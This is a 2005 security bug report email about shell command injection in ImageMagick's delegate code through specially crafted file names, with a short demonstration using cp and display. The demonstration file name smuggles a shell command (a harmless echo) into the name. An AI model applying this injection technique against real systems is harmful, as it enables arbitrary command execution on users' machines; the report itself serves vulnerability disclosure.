It should work with other file formats besides WMF (those for which
delegates are defined).
I'm leaving the severity at normal, because it doesn't seem to be
*that* important. Perhaps this is exploitable through MIME-enabled
MUAs, which would warrant a higher severity.
Message-ID: <email address hidden>
Date: Thu, 29 Dec 2005 22:15:19 +0100
From: Florian Weimer <email address hidden>
To: <email address hidden>
Subject: Shell command injection in delegate code (via file names)
Package: imagemagick
Version: 6.2.4.5-0.3
Tags: security
The delegate code in Imagemagick is vulnerable to shell command
injection, using specially crafted file names:
$ cp /usr/lib/ openoffice/ share/template/ en-US/wizard/ bitmap/ germany. wmf \
'" ; echo "Hi!" >&2; : "'.gif
$ display '" ; echo "Hi!" >&2; : "'.gif
It should work with other file formats besides WMF (those for which
delegates are defined).
I'm leaving the severity at normal, because it doesn't seem to be
*that* important. Perhaps this is exploitable through MIME-enabled
MUAs, which would warrant a higher severity.